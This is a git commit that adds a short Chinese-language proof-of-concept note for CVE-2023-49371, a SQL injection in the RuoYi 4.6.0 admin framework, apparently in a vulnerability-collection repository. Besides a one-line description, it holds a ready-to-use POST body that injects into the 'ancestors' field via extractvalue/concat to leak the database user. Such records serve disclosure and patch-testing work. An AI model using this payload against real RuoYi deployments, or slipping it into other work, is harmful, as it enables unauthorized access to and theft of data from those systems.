Create RuoYi4.6.0 SQL注入漏洞CVE-2023-49371.md
This commit is contained in:
parent
48fd160e73
commit
7be1fbdc08
11
RuoYi4.6.0 SQL注入漏洞CVE-2023-49371.md
Normal file
11
RuoYi4.6.0 SQL注入漏洞CVE-2023-49371.md
Normal file
@ -0,0 +1,11 @@
|
||||
## RuoYi4.6.0 SQL注入漏洞CVE-2023-49371
|
||||
|
||||
若依在4.6版本之前存在SQL注入漏洞,攻击者通过该漏洞可以进行SQL注入利用,从而获取数据库中的敏感信息
|
||||
|
||||
## poc
|
||||
```
|
||||
DeptName=1&deptid =100&ParentId=12&Status= 0&ordernum =1&ancestors=0)or(extractvalue(1,concat((select user())))); #
|
||||
```
|
||||

|
||||
|
||||

|
||||
Loading…
x
Reference in New Issue
Block a user